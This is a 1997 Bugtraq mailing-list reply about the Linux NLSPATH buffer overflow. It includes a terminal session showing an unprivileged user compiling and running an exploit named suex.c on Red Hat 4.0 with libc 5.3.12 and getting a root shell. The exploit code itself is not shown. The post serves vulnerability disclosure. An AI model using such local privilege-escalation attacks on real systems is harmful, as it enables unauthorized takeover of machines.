Bugtraq mailing list archives

Re: Linux NLSPATH buffer overflow


From: mike () thai oxy pub ro (Mihai Sandu)
Date: Thu, 13 Mar 1997 17:25:35 +0200


On Fri, 14 Feb 1997, Alan Cox wrote:

libc5.4 is immune, RedHat has been shipping the fixed libc5.3.12 for a long
time, and all the vendors I had security contacts for were told ages ago.
If they haven't fixed it then I'm disappointed with them, they don't have
an excuse. That libc5.3.12 unpatched also has other fun bugs with buffer
overruns in libc some in the BSD stuff akin to the BSD bugs in rcmd() etc.

Alan


[squid@arbat squid]$ cat /etc/redhat-release
release 4.0 (Colgate)
[squid@arbat squid]$ uname -a
Linux arbat.ase.ro 2.0.18 #3 Fri Mar 7 11:28:49 EET 1997 i586
[squid@arbat squid]$ id
uid=500(squid) gid=500(squid) groups=100(users),500(squid)
[squid@arbat squid]$ ls -la /lib/libc*
lrwxrwxrwx   1 root     root           14 Feb 21 14:52 /lib/libc.so.5 -> libc.so.5.3.12
-rwxr-xr-x   1 root     root       705995 Sep  2  1996 /lib/libc.so.5.3.12
lrwxrwxrwx   1 root     root           22 Feb 21 14:57 /lib/libcom_err.so -> /lib/libcom_err.so.2.0
lrwxrwxrwx   1 root     root           17 Feb 21 14:59 /lib/libcom_err.so.2 -> libcom_err.so.2.0
-rwxr-xr-x   1 root     root         5819 Sep  1  1996 /lib/libcom_err.so.2.0

Naaaaahhhh! It won't work.... :(
But what the hell, let's try!

[squid@arbat squid]$ cc -o suex suex.c
[squid@arbat squid]$ ./suex
bash# id
uid=0(root) gid=500(squid) egid=0(root) groups=100(users),500(squid)

Whooops.. it worked :)

So. It works on RedHat 4.0 Colgate with libc v. 5.3.12

With all my best regards,

        Sandu Mihai


